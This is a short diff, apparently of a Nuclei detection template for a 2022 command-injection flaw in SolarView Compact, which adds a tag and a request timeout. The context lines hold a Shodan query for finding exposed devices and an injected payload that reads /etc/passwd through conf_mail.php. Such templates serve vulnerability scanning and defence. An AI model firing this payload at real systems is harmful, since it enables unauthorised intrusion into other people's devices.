commit
59b66cc9e4
|
@ -18,7 +18,7 @@ info:
|
||||||
metadata:
|
metadata:
|
||||||
shodan-query: http.html:"SolarView Compact"
|
shodan-query: http.html:"SolarView Compact"
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2022,rce,injection
|
tags: cve,cve2022,rce,injection,solarview
|
||||||
|
|
||||||
variables:
|
variables:
|
||||||
cmd: "cat${IFS}/etc/passwd"
|
cmd: "cat${IFS}/etc/passwd"
|
||||||
|
@ -26,6 +26,7 @@ variables:
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@timeout: 25s
|
||||||
POST /conf_mail.php HTTP/1.1
|
POST /conf_mail.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
Loading…
Reference in New Issue